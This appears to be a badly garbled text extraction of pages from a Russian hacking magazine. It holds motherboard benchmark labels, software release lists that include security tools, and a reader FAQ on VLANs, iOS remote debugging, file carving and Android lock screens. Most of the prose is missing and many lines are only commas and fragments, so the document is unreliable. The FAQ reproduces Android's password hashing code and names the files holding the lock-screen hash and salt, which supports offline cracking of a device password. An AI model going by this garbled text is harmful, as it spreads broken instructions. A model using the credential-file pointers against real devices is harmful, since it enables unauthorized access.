6USB 2.0, 2USB 3.0, 1S/PDIF,
1IEEE 1394, 2RJ-45, 5

4DDR3, 10662400
2PCI Express x16, 2PCI Express x1
4SATA II, 2SATA 3.0
Ethernet, 10/100/1000 /

E-ATX

ATX

mATX


7.1 CH, HDA


6USB 2.0, 2USB 3.0, 2S/PDIF,
1RJ-45, 1PS/2, 6

,
, .

,
ASUS Rampage IV Extreme
,

. Foxconn Quantumian 1
, .
, RoG-
, Quantumian 1
. z



[Benchmark charts: wPrime 1.55 1024M, Super Pi 1.5XS 1M, BCLK and WinRAR results for MSI X79MA-GD45, Intel DX79SI, GIGABYTE GA-X79-UD5, FOXCONN Quantumian 1, ASUS Rampage IV Extreme and ASRock X79 Extreme4-M]
Intel , ASUS Rampage IV Extreme

>Net
Ammyy Admin 3.0
Colasoft MAC Scanner Free 1.1
Echofon 1.0.5
Gmvault 1.5
Mail Notifier Beta
Maxuden Radio Station 2.4
NetBScanner 1.0
NetSpeedMonitor 2.5.4.0
ooVoo 3.5.1
Snackr 0.41
Tango 1.6
TCPEye 1.0
Tiggit

>Multimedia
aTunes 2.1.0
CloudTune 1.9
Convertidor De Videos
Falco GIF Animator 3.9
FreeMake Video Downloader 3.0.1
FreeVimager 3.9.9
LameXP 4.04
MediaMonkey 4.0.3
Metanull 1.1
Passport Photo Maker
Redimensionneur 1.0.1
Ringtone Maker 2.4
SuperEasy Codec Checker 1.09
Textaizer Pro 4.3
TinEye Client 1.1
Tomahawk 0.4.2

>Misc
CaPNotifier 1.1.1.0
EyeDefender 1.09
FiletypeID 0.2.1.7
Instant Elevator Music 2.1
Just Manager 0.1 Alpha
MacType 2012
Media Preview 1.2
Multibar 1.1.1.1
MultiWall 1.0.16
PDF Preview 1.0
Proto 0.6.9.7
sTabLauncher 2.2.3
ViPad 1.0
ViStart 2.0
WinMend File Splitter 1.2.9
XWidget 1.4

>>WINDOWS
>Development
BlueGriffon 1.5.2
Boost 1.49.0
DbVisualizer 8.0.9
dirtyJOE 1.5
FaceSDK 4.0
GanttProject 2.5.2
GDIView 1.15
Gobby 0.5
InstallSimple 2.5
mongoDB 2.0.5
Parrot 4.4.0
RocketSVN for Visual Studio 1.0.1
RocketSVN Server 1.0
SciTE 3.2.0
Sqliteman 1.2.2

>>UNIX
>Desktop
Aegisub 2.1.9
Devede 3.22.0
Dvdx 4.0.1.0
Ede 2.0
Flvtomp3 1.2.1
Gimp 2.8.0
Impro-visor 5.16
Kdenlive 0.9
Openoffice 3.4
Outwiker 1.6.0
Phatch 0.2.7.1
Rosegarden 12.04
Scribus 1.4.1
Shutter 0.88.3
Specto 0.4.1
Sview 12.05

>System
DrivePurge 1.0
DXVA Checker 2.8.2
Ext2Fsd 0.51
GeekUninstaller 1.0.1.3
iReboot 1.1.1
JetClean 1.2.0
Metamorphose 1.1.2
Prio 1.98
ProcessEye 1.0
Security AutoRun 1.3
SlimCleaner 3.0
SSD Fresh
StartupEye 1.0
Undela 3.8.3
WinScheduler 7.5.2
Wise Data Recovery 3.11

>Security
AxCrypt 1.7
BitDisk 5.2.0.8
Browser Cleaner 1.2
BugChecker 0.1.149
CERT Failure Observation Engine
(FOE) 1.0
Cintruder 0.2
DeEgger Embedder 1.09
Drivesploit
Egurra 0.1
EMET 3.0
Knock 1.5
Nmap 6.0
Ophcrack 3.4.0
Ostinato 0.5
Rips 0.53
Scapy 2.2.0
Secure Bin 1.0
Secure Wipe 1.0
SIPVicious 0.2.7
Sqlcake 1.1
SQLmap GUI
SteadyCrypt 2.4
USB Disabler 1.1
VERA 0.3

Waterfox 12.0
Wi-Fi Inspector 1.2.1.4
Zona 1.0

>Security
APKinspector BETA
cintruder 0.2
Drivesploit
Graphem 0.3.2
Hacme Bank - Android v1.0
Ispfw 10
METASM 0.1
netsniff-ng 0.5.7
Nmap 6
Nmap 6.00
slowhttptest 1.4
spooftooph 0.5.2
sqlcake 1.1
SQLmap GUI
SWFREtools
Turboshredder 0.033
Usbcryptformat 12.05.20
Volatility 2.0
Wifite 2.0
Wireshark 1.6.8

>Net
Backup-gmail 0.1.2.1
Coccinella 0.96.20
Deluge 1.3.5
Firefox 12.0
Grive 0.0.4
Homer-onferencing 0.23
Hostapd 1.0
Jitsi 1.1
Lightspark 0.5.7
Nethogs 0.8.0
Opera 11.64
Scr 0.8
Sflphone 1.1.0
Smuxi 0.8.9.2
Tickr 0.6.0
Transmission 2.52
Tv-maxe 0.07
Ymono 5.0a

>Games
Turtle_arena 0.6
Ufoai 2.4

>Devel
Ajaxml
Aptana 3.1.2
Atom
Betterpoeditor 1.0
Catalyst 5.90012
Codeigniter 2.1.0
Cppcheck 1.54
Firmin 1.0.0
Ganttproject 2.5.2
Gpac 0.5.0
Llvm 3.1
Monodevelop 3.0.1
Netsgraph 1.0.004
Opengrok 0.11.1
Perl 5.16.0
Qtcreator 2.5
Tig 1.0
Zengl 0.3.0b3

Xfce 4.10
Zxtune b1716

>>MAC
Ambientweet 1.1
Bartender 0.9.05
Blender 2.63a
CheatSheet 1.0.1
CornerClick 0.9
Friendz 4.2.5
Gmvault 1.5
ipswDownloader 2.2.0
Loginox 1.0.6b5
Mac Malware Remover 1.1.5
MagicPrefs
Quicksilver 68
SMARTReporter 3.0.1
SMBUp 1.4.0
SourceTree 1.4.2
SpeedTao 0.9.5
Tomahawk 0.4.2
Trillian 1.3.37

>X-distr
Linux Mint 13

>System
Bluelog 1.0.3
Ck 3.3
Drizzle 7.2.2a
Laptop_mode 1.61
Linaro 12.04
Linux 3.4
Loganalyzer 3.4.3
Nomachinenx 3.5.0
Nvidia 295.53
Orientdb 1.0
Pulseaudio 2.0
Sdfs 1.1.3
Systemrescuecd 2.7.1
Virtualbox 4.1.16
Wine_etersoft

>Server
Apache 2.2.22
Asterisk 10.4.1
Bind 9.9.1
Cups 1.5.3
Dhcp 4.2.3-p2
Dovecot 2.1.7
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.24
Nsd 3.2.10
Openldap 2.4.31
Openvpn 2.2.2
Postfix 2.9.3
Postgresql 9.1.3
Pure-ftpd 1.0.35
Samba 3.6.5
Sendmail 8.14.5
Snort 2.9.2.3
Sqlite 3.7.12.1
Squid 3.1.19
Syslog-ng 3.3.5
Unbound 1.4.17
Vsftpd 3.0.0


FAQ

, Digital Security (cherboff@gmail.com)

FAQ


FAQ@REAL.XAKEP.RU


IP ,
?

A ,
, .


,
. Linux ifconfig:

ifconfig eth0:alias1

alias1 .
Windows
TCP/IP.
IP IP- .
,
Q Bitlocker,
- Linux?
, Windows Vista
A
Bitlocker. ,

. ,

(Linux / Mac OS X)
dislocker (bit.ly/dislocker).
,
.
,

NTFS. ( ,

.)

FUSE.
,
(
, ).
USB, .

, .

VLAN?
, ,
A VLAN,
.
, , -

, trunk (
,
, ),
.
VLAN ID
. Linux
8021q, Ethernet.
sudo modprobe 8021q

vconfig (
-
,
vlan). , VLAN ID = 1337 eth1:
sudo vconfig add eth1 1337


eth1.1337,
MAC- IP-.
VLAN ID 1337. Windows, ,
,
.
, -

IPHONE?
,
IDA Hex-Rays.
,
,
. ,
iOS,
. ,

IDA +
debugserver (GDB-server iOS).


OSX (
) c iOS SDK iOS- . iPhone
( XCode) , ,
( root) .

SSH. ,
, IDA.


iOS SDK fat-elf
( ,
,
) . , iPhone.
lipo
ARM7:

lipo -thin armv7 /Developer/usr/bin/debugserver -output gdb-srv


FAQ

,
.
VLAN ID
,
.
.

PROSet, Intel.

VLAN ID.

,
LAN, DHCP
, ?
192.168.0.1,
. ?
,
A .
-
.

MAC-
, ,
( pingscan
ARP-). TCP SYN-
IP ,
, MAC-

(
IP- ,
).
, ,
(- IP-
),
, .
, ! ,

. gatewayfinder (https://bit.ly/gwfinder).
Python
scapy, TCP.
IP, ,
MAC.

.

,
,
. ,
,
,

XML (pastebin.com/g8SFczFz) iPhone.



(
XML)
ldid. Cydia
( AppStore'
):

ldid -Srules.xml gdb-srv


Brainfuck, JS.
: ,
- ,
,
JS- Revelo (bit.ly/Revelo).
,

,
DOM,


.
,
,
.



JAVA SCRIPT

.
,
?

Revelo JavaScript

, .

Notes. -x :
springboard.

~/ gdb-srv -x spring host:1337 \
/Applications/MobileNotes.app/MobileNotes

GDB

.

IDA
GDB (Debugger
Attach Remote GDB).
(Debug options
Edit Exceptions)
SIGSTOP, Stop program.
, IP
, iPhone.
, ,
iOS-,
.


FAQ

Flash-.
Flash
A HTML5, Flash
-

.
,
, , .

, . ,

,
SWF Investigator (adobe.ly/swfinv),

. -,
Adobe Labs! , ,

?
SWF-
,
,
.
- , ,
, flashvars Action
Message Format. ActionScript, HEX-
Local Shared
Objects (Flash cookie).

Android
?
, 2.2
A Android

, .
, , .
:

public byte[] passwordToHash(String password) {
    if (password == null) {
        return null;
    }
    String algo = null;
    byte[] hashed = null;
    try {
        byte[] saltedPassword = (password + getSalt()).getBytes();
        byte[] sha1 = MessageDigest.getInstance(algo = "SHA-1").digest(saltedPassword);
        byte[] md5 = MessageDigest.getInstance(algo = "MD5").digest(saltedPassword);
        hashed = (toHex(sha1) + toHex(md5)).getBytes();
    } catch (NoSuchAlgorithmException e) {
        Log.w(TAG, "Failed to encode string because of missing algorithm: " + algo);
    }
    return hashed;
}
,
, .
/data/system/password.key, ,
. ,
, lockscreen.password_salt
SQLite, , ,
/data/data/com.android.providers.settings/databases/settings.db.

,
.
?
,
A
,

Scalpel (bit.ly/frscscalpel),
.
,

.


,
.
, ,

. -


,

,
SCALPEL

.
PDF:
pdf

5000000

%PDF

%EOF\x0d

REVERSE

pdf
,
, , %PDF
%EOF\x0d .
REVERSE
,
. ,
.
Ctrl + C
bash
-
.
- ^Cuser@hostname:~#.
,
- ?
bash, ,
A ,
,
.

, ,
:).
,

( ,
#
).
,
ESC-, .
:

PS1="\[\033[G\]$PS1"


$PS1, .bashrc
(
).
RFC-
?

A
,
, ,

.
, ,

, ,
,
RFC ,
Pretty-rfc (bit.ly/prettyrfc).
,
. z


WWW2
LOAD IMPACT

loadimpact.com
, -
( , ), ab ( Apache) Tsung.
- ? . , .
Load Impact 50 000
.
. , . Load Impact
. ,
.

SQL-

sqlfiddle.com
SQL , ,
, . , , SQL Fiddle . ,
SQL,
SQL- . ,
, , (Execution Plan). : MS SQL Server, MySQL, Oracle, PostgreSQL, SQLite.
( Fiddle) ,
, .

snag.gy
,
. , (,
- ),
. , , ,
.
(,
Print Screen), snaggy
, .
.

Web 2.0
IRC-

https://irccloud.com
, #xakep
. IRC, ,
.
-
. IRC- ,
( mIRC),
-. IRCCloud, ,
. , - .

SQL FIDDLE

SNAGGY

IRCCLOUD
